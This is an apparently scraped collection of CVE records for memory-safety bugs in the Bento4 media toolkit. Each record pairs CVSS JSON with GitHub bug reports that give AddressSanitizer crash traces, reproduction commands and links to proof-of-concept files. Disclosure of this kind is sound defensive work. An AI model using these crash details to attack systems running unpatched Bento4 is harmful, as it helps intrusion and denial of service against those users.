2023-07-20T02:13:31Z
https://github.com/free5gc/free5gc/issues/387
1,349,239,716
387
CVE-2022-3662
2022-10-26T19:15:17.857
A vulnerability was found in Axiomatic Bento4. It has been declared as critical. This vulnerability affects the function GetOffset of the file Ap4Sample.h of the component mp42hls. The manipulation leads to use after free. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-212002 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/files/9817606/mp42hls_cuaf_Ap4Sample99.zip" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/802" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.212002" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/802
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, there. There is an heap overflow in mp42hls, GetOffset, Ap4Sample.h:99, in the newest commit 5e7bb34a08272c49242196eba1cefab8af55f381. This seems to be an incomplete fix of issue #461. Here is the reproducing command: ~~~~ ./mp42hls poc ~~~~ POC: [mp42hls_cuaf_Ap4Sample99.zip](https://github.com/axiomatic-systems/Bento4/files/9817606/mp42hls_cuaf_Ap4Sample99.zip) (unzip first) Here is the reproduce trace reported by ASAN: ~~~~ ==2007234==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000005dd8 at pc 0x0000005852ab bp 0x7ffc127b7960 sp 0x7ffc127b7958 READ of size 8 at 0x604000005dd8 thread T0 #0 0x5852aa in AP4_Sample::GetOffset() const /benchmark/Bento4/Source/C++/Core/Ap4Sample.h:99:48 #1 0x5852aa in AP4_LinearReader::Advance(bool) /benchmark/Bento4/Source/C++/Core/Ap4LinearReader.cpp:434:54 #2 0x585ab1 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /benchmark/Bento4/Source/C++/Core/Ap4LinearReader.cpp:530:29 #3 0x509a31 in ReadSample(SampleReader&, AP4_Track&, AP4_Sample&, AP4_DataBuffer&, double&, double&, bool&) /benchmark/Bento4/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1004:32 #4 0x509a31 in WriteSamples(AP4_Mpeg2TsWriter*, PackedAudioWriter*, AP4_Track*, SampleReader*, AP4_Mpeg2TsWriter::SampleStream*, AP4_Track*, SampleReader*, AP4_Mpeg2TsWriter::SampleStream*, unsigned int, unsigned char) /benchmark/Bento4/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:1289:22 #5 0x509a31 in main /benchmark/Bento4/Source/C++/Apps/Mp42Hls/Mp42Hls.cpp:2188:14 #6 0x7f33bacb6082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41d8ed in _start ( /benchmark/Bento4/build-a/mp42hls+0x41d8ed) 0x604000005dd8 is located 8 bytes inside of 48-byte region [0x604000005dd0,0x604000005e00) freed by thread T0 here: #0 0x4f88b7 in operator delete(void*) /dependence/llvm11/llvm-11.0.0.src/projects/compiler-rt/lib/asan/asan_new_delete.cpp:160:3 #1 0x584f07 in AP4_LinearReader::SampleBuffer::~SampleBuffer() /benchmark/Bento4/Source/C++/Core/Ap4LinearReader.h:104:26 #2 0x584f07 in AP4_LinearReader::Advance(bool) /benchmark/Bento4/Source/C++/Core/Ap4LinearReader.cpp:462:17 previously allocated by thread T0 here: #0 0x4f7eb7 in operator new(unsigned long) /dependence/llvm11/llvm-11.0.0.src/projects/compiler-rt/lib/asan/asan_new_delete.cpp:99:3 #1 0x584892 in AP4_LinearReader::Advance(bool) /benchmark/Bento4/Source/C++/Core/Ap4LinearReader.cpp:422:41 SUMMARY: AddressSanitizer: heap-use-after-free /benchmark/Bento4/Source/C++/Core/Ap4Sample.h:99:48 in AP4_Sample::GetOffset() const Shadow bytes around the buggy address: 0x0c087fff8b60: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8b70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8b80: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8b90: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd 0x0c087fff8ba0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd =>0x0c087fff8bb0: fa fa fd fd fd fd fd fa fa fa fd[fd]fd fd fd fd 0x0c087fff8bc0: fa fa fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c087fff8bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8bf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2007234==ABORTING ~~~~
Concurrent heap use after free in mp42hls, GetOffset, Ap4Sample.h:99
https://api.github.com/repos/axiomatic-systems/Bento4/issues/802/comments
0
2022-10-19T06:53:27Z
2023-05-29T02:40:07Z
https://github.com/axiomatic-systems/Bento4/issues/802
1,414,407,802
802
CVE-2022-3663
2022-10-26T19:15:19.093
A vulnerability was found in Axiomatic Bento4. It has been rated as problematic. This issue affects the function AP4_StsdAtom of the file Ap4StsdAtom.cpp of the component MP4fragment. The manipulation leads to null pointer dereference. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212003.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/files/9817303/mp4fragment_npd_Ap4StsdAtom.cpp75.zip" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/800" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.212003" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/800
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, there. There is a segmentation fault caused by null pointer dereference in MP4fragment, Ap4StsdAtom.cpp:75 in the newest commit 5e7bb34a08272c49242196eba1cefab8af55f381. The reason for this issue is that the return value of the GetSampleDescription is unchecked. <img width="1055" alt="image" src="https://user-images.githubusercontent.com/7632714/196609587-2e88a5f1-1aac-4286-8c12-f28dd46e2f7b.png"> To reproduce, run: ~~~~ ./mp4fragment poc /dev/null ~~~~ Here is the trace reported by ASAN: ~~~~ ==3437252==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000005fcb24 bp 0x60b000000300 sp 0x7ffec2967f00 T0) ==3437252==The signal is caused by a READ memory access. ==3437252==Hint: address points to the zero page. #0 0x5fcb24 in AP4_StsdAtom::AP4_StsdAtom(AP4_SampleTable*) /benchmark/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:75:47 #1 0x6b7b51 in AP4_SampleTable::GenerateStblAtom(AP4_ContainerAtom*&) /benchmark/Bento4/Source/C++/Core/Ap4SampleTable.cpp:59:30 #2 0x620f26 in AP4_TrakAtom::AP4_TrakAtom(AP4_SampleTable*, unsigned int, char const*, unsigned int, unsigned long long, unsigned long long, unsigned long long, unsigned int, unsigned long long, unsigned short, char const*, unsigned int, unsigned int, unsigned short, unsigned short, int const*) /benchmark/Bento4/Source/C++/Core/Ap4TrakAtom.cpp:131:28 #3 0x61e255 in AP4_Track::AP4_Track(AP4_SampleTable*, unsigned int, unsigned int, unsigned long long, unsigned int, unsigned long long, AP4_Track const*) /benchmark/Bento4/Source/C++/Core/Ap4Track.cpp:183:22 #4 0x500733 in Fragment(AP4_File&, AP4_ByteStream&, AP4_Array<TrackCursor*>&, unsigned int, unsigned int, bool, bool, bool) /benchmark/Bento4/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:360:39 #5 0x500733 in main /benchmark/Bento4/Source/C++/Apps/Mp4Fragment/Mp4Fragment.cpp:1475:5 #6 0x7f0f643e9082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41d8ad in _start ( /benchmark/Bento4/build-a/mp4fragment+0x41d8ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /benchmark/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:75:47 in AP4_StsdAtom::AP4_StsdAtom(AP4_SampleTable*) ==3437252==ABORTING ~~~~ [mp4fragment_npd_Ap4StsdAtom.cpp75.zip](https://github.com/axiomatic-systems/Bento4/files/9817303/mp4fragment_npd_Ap4StsdAtom.cpp75.zip) (unzip first)
Segmentation fault caused by null pointer dereference in MP4fragment, Ap4StsdAtom.cpp:75
https://api.github.com/repos/axiomatic-systems/Bento4/issues/800/comments
0
2022-10-19T06:06:34Z
2023-05-29T02:51:53Z
https://github.com/axiomatic-systems/Bento4/issues/800
1,414,350,784
800
CVE-2022-3664
2022-10-26T19:15:21.197
A vulnerability classified as critical has been found in Axiomatic Bento4. Affected is the function AP4_BitStream::WriteBytes of the file Ap4BitStream.cpp of the component avcinfo. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212004.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/files/9746288/avcinfo_poc1.zip" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/794" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.212004" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/794
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hello, developers of Bento4! I also found some **heap buffer overflow** bugs in avcinfo by using our fuzzing tools with ASAN. Here is details: ## Bug1 ``` ================================================================= ==48171==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000038 at pc 0x7f1ff86b4733 bp 0x7fff66ab01b0 sp 0x7fff66aaf958 READ of size 8 at 0x602000000038 thread T0 #0 0x7f1ff86b4732 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) #1 0x5638f29e7432 in AP4_BitStream::WriteBytes(unsigned char const*, unsigned int) Bento4/Source/C++/Codecs/Ap4BitStream.cpp:133 #2 0x5638f29c0c69 in PrintSliceInfo Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:84 #3 0x5638f29c0c69 in main Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:172 #4 0x7f1ff7ccac86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x5638f29c1679 in _start (Bento4/avcinfo+0x5679) 0x602000000038 is located 0 bytes to the right of 8-byte region [0x602000000030,0x602000000038) allocated by thread T0 here: #0 0x7f1ff871b608 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0608) #1 0x5638f29ed326 in AP4_DataBuffer::ReallocateBuffer(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x5638f29ed326 in AP4_DataBuffer::SetDataSize(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x79732) Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa fd fa fa fa 00[fa]fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==48171==ABORTING ``` ### Poc [avcinfo_poc1.zip](https://github.com/axiomatic-systems/Bento4/files/9746288/avcinfo_poc1.zip) ## Bug2 ``` ================================================================= ==48988==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000011 at pc 0x561df275ee6e bp 0x7ffca5855570 sp 0x7ffca5855560 READ of size 1 at 0x602000000011 thread T0 #0 0x561df275ee6d in main Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:166 #1 0x7f9a9fbd8c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #2 0x561df275f679 in _start (Bento4/avcinfo+0x5679) 0x602000000011 is located 0 bytes to the right of 1-byte region [0x602000000010,0x602000000011) allocated by thread T0 here: #0 0x7f9aa0629608 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0608) #1 0x561df278b326 in AP4_DataBuffer::ReallocateBuffer(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x561df278b326 in AP4_DataBuffer::SetDataSize(unsigned int) Bento4/Source/C++/Core/Ap4DataBuffer.cpp:151 SUMMARY: AddressSanitizer: heap-buffer-overflow Bento4/Source/C++/Apps/AvcInfo/AvcInfo.cpp:166 in main Shadow bytes around the buggy address: 0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c047fff8000: fa fa[01]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==48988==ABORTING ``` ### PoC [avcinfo_poc2.zip](https://github.com/axiomatic-systems/Bento4/files/9746311/avcinfo_poc2.zip) ## Verification Steps ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4 mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./avcinfo poc ``` ## Environment - Ubuntu 18.04 - clang 10.01 - Bento4 master branch [4df7274e](https://github.com/axiomatic-systems/Bento4/commit/4df7274e5e57e6219ca1e5dbdcb99ad1f7abb743) commit and version 1.6.0-639 Thanks for your time!
Some heap buffer overflow bugs exist in avcinfo
https://api.github.com/repos/axiomatic-systems/Bento4/issues/794/comments
0
2022-10-10T13:34:03Z
2023-05-29T02:51:50Z
https://github.com/axiomatic-systems/Bento4/issues/794
1,403,189,077
794
CVE-2022-3666
2022-10-26T19:15:23.570
A vulnerability, which was classified as critical, has been found in Axiomatic Bento4. Affected by this issue is the function AP4_LinearReader::Advance of the file Ap4LinearReader.cpp of the component mp42ts. The manipulation leads to use after free. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-212006 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/files/9744391/mp42ts_poc.zip" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/793" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.212006" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/793
[ "Exploit", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hello, developers of Bento4. I found a heap use after free bug in AP4_LinearReader::Advance(bool) with ASAN. The following is the details. ### Details ``` ================================================================= ==32056==ERROR: AddressSanitizer: heap-use-after-free on address 0x604000001f98 at pc 0x56093865ee11 bp 0x7ffea5a93280 sp 0x7ffea5a93270 READ of size 8 at 0x604000001f98 thread T0 #0 0x56093865ee10 in AP4_LinearReader::Advance(bool) Bento4/Source/C++/Core/Ap4LinearReader.cpp:434 #1 0x560938666716 in AP4_LinearReader::ReadNextSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) Bento4/Source/C++/Core/Ap4LinearReader.cpp:530 #2 0x5609386402ea in ReadSample Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:181 #3 0x56093863a518 in WriteSamples Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:306 #4 0x56093863a518 in main Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:638 #5 0x7f8ea7badc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #6 0x56093863f9d9 in _start (Bento4/mp42ts+0x3a9d9) 0x604000001f98 is located 8 bytes inside of 48-byte region [0x604000001f90,0x604000001fc0) freed by thread T0 here: #0 0x7f8ea899d9c8 in operator delete(void*, unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe19c8) #1 0x56093865e49f in AP4_LinearReader::SampleBuffer::~SampleBuffer() Bento4/Source/C++/Core/Ap4LinearReader.h:104 #2 0x56093865e49f in AP4_LinearReader::Advance(bool) Bento4/Source/C++/Core/Ap4LinearReader.cpp:462 previously allocated by thread T0 here: #0 0x7f8ea899c448 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe0448) #1 0x56093865ddb9 in AP4_LinearReader::Advance(bool) Bento4/Source/C++/Core/Ap4LinearReader.cpp:422 SUMMARY: AddressSanitizer: heap-use-after-free Bento4/Source/C++/Core/Ap4LinearReader.cpp:434 in AP4_LinearReader::Advance(bool) Shadow bytes around the buggy address: 0x0c087fff83a0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff83b0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff83c0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff83d0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff83e0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa =>0x0c087fff83f0: fa fa fd[fd]fd fd fd fd fa fa fd fd fd fd fd fa 0x0c087fff8400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==32056==ABORTING ``` ### PoC [mp42ts_poc.zip](https://github.com/axiomatic-systems/Bento4/files/9744391/mp42ts_poc.zip) ### Verification Steps ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4 mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42ts poc /dev/null ``` ### Enviroment - Ubuntu 18.04 - clang 10.01 - Bento4 master branch [4df7274e](https://github.com/axiomatic-systems/Bento4/commit/4df7274e5e57e6219ca1e5dbdcb99ad1f7abb743) commit and version 1.6.0-639
heap-use-after-free bug in mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/793/comments
0
2022-10-10T08:51:58Z
2023-05-29T02:51:21Z
https://github.com/axiomatic-systems/Bento4/issues/793
1,402,818,781
793
CVE-2022-3667
2022-10-26T19:15:24.427
A vulnerability, which was classified as critical, was found in Axiomatic Bento4. This affects the function AP4_MemoryByteStream::WritePartial of the file Ap4ByteStream.cpp of the component mp42aac. The manipulation leads to heap-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212007.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" } ] }
